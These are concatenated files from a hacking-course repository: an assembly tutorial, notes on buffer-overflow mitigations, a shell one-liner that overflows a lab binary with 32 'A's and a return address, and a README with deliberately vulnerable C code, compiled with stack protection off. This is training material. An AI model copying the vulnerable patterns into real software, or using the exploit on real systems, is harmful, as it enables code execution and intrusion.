7. **Stack**: The stack is a region of memory used for temporary storage of data. It's especially important for function calls and for saving the state of the program.
8. **Debugging and Tools**: Knowledge of tools for writing, assembling, linking, and debugging assembly programs is vital. This includes assemblers (like NASM for x86 and AS for ARM), linkers (like LD), and debuggers (like GDB).
For both x86 and ARM:
- **x86 Assembly**: x86 assembly can be written in either AT&T syntax or Intel syntax, which have some differences. x86 has a lot of legacy, which means there are many instructions, some of which do similar things. x86 architecture also includes different modes of operation, such as real mode, protected mode, and long mode (64-bit), each of which changes how the CPU interprets instructions.
- **ARM Assembly**: ARM uses a load-store architecture, which means that only specific instructions (load and store) can access memory. Most other instructions operate on registers. ARM also has a simpler, more orthogonal instruction set than x86. ARM processors also often include a Thumb instruction set, which uses 16-bit instructions instead of the standard 32-bit, for more compact code.
9. **Interrupts and Exception Handling**: Understanding how interrupts work, and how to handle exceptions at a low level, is a significant part of assembly programming.
10. **System Calls**: System calls are how a program interacts with the operating system. They can do things like read from a file, write to the console, allocate memory, and more. The specifics of how system calls are made are different on each operating system.
11. **Inline Assembly**: In many cases, you might use assembly language within a high-level language program to optimize a specific part of the code. Understanding how to write and use inline assembly could be very helpful.
Assembly language is low-level, so it requires a good understanding of the underlying hardware. But it also gives you a lot of power and flexibility, since you're working directly with the CPU and memory. Be patient with yourself as you learn, and practice regularly to reinforce your understanding.
## Examples
Different assemblers might require slightly different syntax, and details like system calls can vary between different operating systems.
**x86 Assembly**
This is a simple "Hello, World!" program in x86 assembly using the NASM assembler:
```assembly
section .data
hello db 'Hello, World!',0 ; null-terminated string to be printed
section .text
global _start
_start:
; syscall to write
mov eax, 4 ; syscall number (sys_write)
mov ebx, 1 ; file descriptor (stdout)
mov ecx, hello ; pointer to message to write
mov edx, 13 ; message length
int 0x80 ; call kernel
; syscall to exit
mov eax, 1 ; syscall number (sys_exit)
xor ebx, ebx ; exit code
int 0x80 ; call kernel
```
In this program, we're using the `int 0x80` instruction to make system calls. The specific system call and its arguments are determined by the values we put in the `eax`, `ebx`, `ecx`, and `edx` registers.
**ARM Assembly**
This is the same "Hello, World!" program in ARM assembly. This example uses the GNU assembler and is for Linux:
```assembly
.section .data
hello: .asciz "Hello, World!"
.text
.global _start
_start:
mov r0, 1 ; file descriptor (stdout)
ldr r1, =hello ; pointer to message to write
mov r2, 13 ; message length
mov r7, 4 ; syscall number (sys_write)
swi 0 ; call kernel
mov r0, 0 ; exit code
mov r7, 1 ; syscall number (sys_exit)
swi 0 ; call kernel
```
The ARM version is similar to the x86 version. We're using the `swi 0` instruction to make system calls, and the `mov` and `ldr` instructions to put values into registers.
## Reversing a Simple C Program
Let's start with a simple C program:
```c
#include <stdio.h>
int main() {
int a = 5;
int b = 7;
int sum = a + b;
printf("The sum is: %d\n", sum);
return 0;
}
```
First, you'll want to compile this program. We'll use GCC, a common C compiler. Use the `-g` flag to include debugging symbols, which will make the disassembled output easier to understand:
```
gcc -g -o sum sum.c
```
This compiles the program into an executable file named `sum`.
Now, you can disassemble the program using a tool like `objdump`:
```
objdump -d sum
```
This will output the assembly code of the program. The `-d` flag tells `objdump` to disassemble the executable sections of the file.
The output can be quite long and complex, especially for larger programs, but here's an annotated version of what the `main` function might look like in assembly:
```assembly
0000000000001139 <main>:
1139: 55 push rbp
113a: 48 89 e5 mov rbp,rsp
113d: 48 83 ec 10 sub rsp,0x10
1141: c7 45 fc 05 00 00 00 mov DWORD PTR [rbp-0x4],0x5
1148: c7 45 f8 07 00 00 00 mov DWORD PTR [rbp-0x8],0x7
114f: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
1152: 03 45 f8 add eax,DWORD PTR [rbp-0x8]
1155: 89 45 f4 mov DWORD PTR [rbp-0xc],eax
1158: 8b 45 f4 mov eax,DWORD PTR [rbp-0xc]
115b: 89 c6 mov esi,eax
115d: 48 8d 3d a4 0e 00 00 lea rdi,[rip+0xea4] # 2008 <_IO_stdin_used+0x8>
1164: b0 00 mov al,0x0
1166: e8 c5 fe ff ff call 1030 <printf@plt>
116b: b8 00 00 00 00 mov eax,0x0
1170: c9 leave
1171: c3 ret
```
Here's what's happening in this function, line by line:
- The function starts by setting up the stack frame: it pushes the old base pointer (`rbp`) onto the stack, then moves the stack pointer (`rsp`) to the new base pointer. This creates a new stack frame for the `main` function.
- The `sub rsp,0x10` instruction reserves space on the stack for local variables.
- The `mov` instructions store the values of `a` and `b` on the stack. The `[rbp-0x4]` and `[rbp-0x8]` are offsets from the base pointer, used to identify the locations of these local variables.
- The `add` instruction adds `a` and `b` together, and the result is stored on the stack as `sum`.
- The `lea` instruction loads the address of the format string for `printf` into `rdi`, and the `mov` and `call` instructions call `printf` to print the sum. The `printf` function is called with the string "The sum is: %d\n" and the sum as its arguments.
- The `mov eax,0x0` instruction sets the return value of the function to 0.
- The `leave` and `ret` instructions clean up the stack frame and return from the function.
Please note that exact assembly might differ based on the compiler, version, and optimization settings used. The interpretation of assembly code requires understanding of both the instruction set architecture (in this case, x86-64) and the calling convention used by the system (in this case, the System V AMD64 ABI, which is common on Unix-like systems, including Linux).
For more advanced reverse engineering, you might use a tool like Ghidra or IDA Pro, which provide more sophisticated analysis and decompilation capabilities. However, they require more knowledge to use effectively. |
Markdown | h4cker/buffer_overflow_example/mitigations.md | # Mitigations for Buffer Overflows and Code Execution Prevention
When running a program, compilers often create random values known as canaries, and place them on the stack after each buffer. Much like the coalmine birds for which they are named, these canary values flag danger. Checking the value of the canary against its original value can determine whether a buffer overflow has occurred. If the value has been modified, the program can be shut down or go into an error state rather than continuing to the potentially modified return address.
Additional defenses are provided by some of today’s operating systems in the form of non-executable stacks and address space layout randomization (ASLR). Non-executable stacks (i.e., data execution prevention [DEP]) mark the stack and in some cases other structures as areas where code cannot be executed. This means that an attacker cannot inject exploit code onto the stack and expect it to successfully run.
ASLR was developed to defend against return oriented programming (a workaround to non-executable stacks where existing pieces of code are chained together based on the offsets of their addresses in memory). It works by randomizing the memory locations of structures so that their offsets are harder to determine. Had these defenses existed in the late 1980s, the Morris Worm may have been prevented. This is due to the fact that it functioned in part by filling a buffer in the UNIX fingerd protocol with exploit code, then overflowing that buffer to modify the return address to point to the buffer filled with exploit code. ASLR and DEP would have made it more difficult to pinpoint the address to point to, if not making that area of memory non-executable completely.
Sometimes a vulnerability slips through the cracks, remaining open to attack despite controls in place at the development, compiler, or operating system level. Sometimes, the first indication that a buffer overflow is present can be a successful exploitation. In this situation, there are two critical tasks to accomplish. First, the vulnerability needs to be identified, and the code base must be changed to resolve the issue. Second, the goal becomes to ensure that all vulnerable versions of the code are replaced by the new, patched version. Ideally this will start with an automatic update that reaches all Internet-connected systems running the software.
However, it cannot be assumed that such an update will provide sufficient coverage. Organizations or individuals may use the software on systems with limited access to the Internet. These cases require manual updates. This means that news of the update needs to be distributed to any admins who may be using the software, and the patch must be made easily available for download. Patch creation and distribution should occur as close to the discovery of the vulnerability as possible. Thus, minimizing the amount of time users and systems are vulnerable.
Through the use of safe buffer handling functions, and appropriate security features of the compiler and operating system, a solid defense against buffer overflows can be built. Even with these steps in place, consistent identification of these flaws is a crucial step to preventing an exploit. Combing through lines of source code looking for potential buffer overflows can be tedious. Additionally, there is always the possibility that human eyes may miss on occasion. Luckily, static analysis tools (similar to linters) that are used to enforce code quality have been developed specifically for the detection of security vulnerabilities during development.
## Additional References
- [Stack Canaries](https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/)
- [Address Space Layout Randomization](https://en.wikipedia.org/wiki/Address_space_layout_randomization)
- [Stack Smashing](https://en.wikipedia.org/wiki/Buffer_overflow_protection#GNU_Compiler_Collection_(GCC))
- [NX bit (no-execute)](https://en.wikipedia.org/wiki/NX_bit) |
Shell Script | h4cker/buffer_overflow_example/one_liner_exploit.sh | #!/bin/bash
# Simple one-liner script to exploit the vuln_program buffer overflow
# Author: Omar Santos @santosomar
# Explanation:
# echo -en is used to enable interpretation of backslash escapes and turns off
# the default behavior of the echo command which is to add a newline at the end of the output.
# $(for i in {1..32}; do echo -n "A"; done) is a bash command that will iterate 32 times and print 'A' each time without a newline.
# $'\x9d\x84\x04\x08' is an octal escape representation that will produce the 4 bytes of hex representation, in this case '\x9d\x84\x04\x08'
# This command will output a string of 32 'A's followed by that 4 bytes value.
# Note that the echo command in Bash behaves differently across different shells (like bash, zsh, etc)
# and different platforms (like Linux, MacOS, Windows) so the command could produce different results
# depending on the environment where you run it.
echo -en $(for i in {1..32}; do echo -n "A"; done)$'\x9d\x84\x04\x08' | ./vuln_program |
Markdown | h4cker/buffer_overflow_example/README.md | # Buffer Overflow Example
***This is an example of a very bad coding practices*** that introduces a buffer overflow. The purpose of this code is to serve as a demonstration and exercise for [The Art of Hacking Series and live training](https://www.safaribooksonline.com/search/?query=Omar%20Santos%20hacking&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&sort=relevance)
```
#include <stdio.h>
void secretFunction()
{
printf("Omar's Crappy Function\n");
printf("This is a super secret function!\n");
}
void echo()
{
char buffer[20];
printf("Please enter your name:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
```
The `char buffer[20];` is a really bad idea. The rest will be demonstrated in the course.
You can compile this code or use the already-compiled binary [here](https://github.com/The-Art-of-Hacking/h4cker/raw/master/buffer_overflow_example/vuln_program).
For 32 bit systems you can use [gcc](https://www.gnu.org/software/gcc/) as shown below:
```
gcc vuln.c -o vuln -fno-stack-protector
```
For 64 bit systems
```
gcc vuln.c -o vuln -fno-stack-protector -m32
```
`-fno-stack-protector` disabled the stack protection. Smashing the stack is now allowed. `-m32` made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines.
## Additional Examples and References
A buffer overflow is a type of software vulnerability that occurs when a program attempts to store more data in a buffer (a temporary storage area) than it can hold. This can cause the extra data to overflow into adjacent memory locations, potentially overwriting important data or instructions.
Here is another example of a buffer overflow in C:
```
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[]) {
char buffer[5]; // Declare a buffer with a size of 5 bytes
strcpy(buffer, argv[1]); // Copy the first command line argument into the buffer
printf("%s\n", buffer); // Print the contents of the buffer
return 0;
}
```
In this example, the program declares a `buffer` of size 5 bytes and uses the `strcpy` function to copy the first command line argument into the buffer. However, if the command line argument is longer than 5 bytes, the `strcpy` function will copy all the characters of the argument into the buffer, causing the extra characters to overflow into adjacent memory locations.
A malicious attacker could exploit this vulnerability by providing a long string as an argument to the program, which can cause the program to crash or execute arbitrary code.
Another example:
```
#include <stdio.h>
void vulnerable_function(char* user_input) {
char buffer[10];
strcpy(buffer, user_input); // copy user input into the buffer
printf("Input: %s\n", buffer);
}
int main(int argc, char* argv[]) {
vulnerable_function(argv[1]);
return 0;
}
```
In this example, the program has a function called `vulnerable_function` which takes a single argument, a string of user input. The function then declares a buffer of size 10 bytes and uses the `strcpy` function to copy the user input into the buffer.
However, if the user input is longer than 10 bytes, the `strcpy` function will copy all the characters of the input into the buffer, causing the extra characters to overflow into adjacent memory locations.
A malicious attacker could exploit this vulnerability by providing a long string as an argument to the program when it is executed, which can cause the program to crash or execute arbitrary code.
There are several ways to fix a buffer overflow vulnerability. Here are a few examples:
- Using a different function: Instead of using the `strcpy` function, which does not check for buffer overflow, you can use a function like `strncpy` which takes an additional argument specifying the maximum number of bytes to be copied. This can prevent overflowing the buffer.
```
strncpy(buffer, user_input, sizeof(buffer) - 1);
buffer[sizeof(buffer) - 1] = '\0';
```
- Using a library function: You can use a library function like `snprintf` which can be used to write a limited number of characters to a buffer, making sure that the buffer is not overflown.
```
snprintf(buffer, sizeof(buffer), "%s", user_input);
```
- Input validation: You can validate the user input before it is copied into the buffer, checking if the length of the input is less than the size of the buffer.
```
if (strlen(user_input) < sizeof(buffer)) {
strcpy(buffer, user_input);
} else {
printf("Error: input too long\n");
exit(1);
}
```
- Using a safer data type: You can use a safer data type like std::string in C++, which automatically handles buffer overflow and other security issues.
```
std::string buffer;
buffer = user_input;
```
It is important to remember that buffer overflow vulnerabilities can have serious security implications, so it is essential to ensure that your code is free of such vulnerabilities. |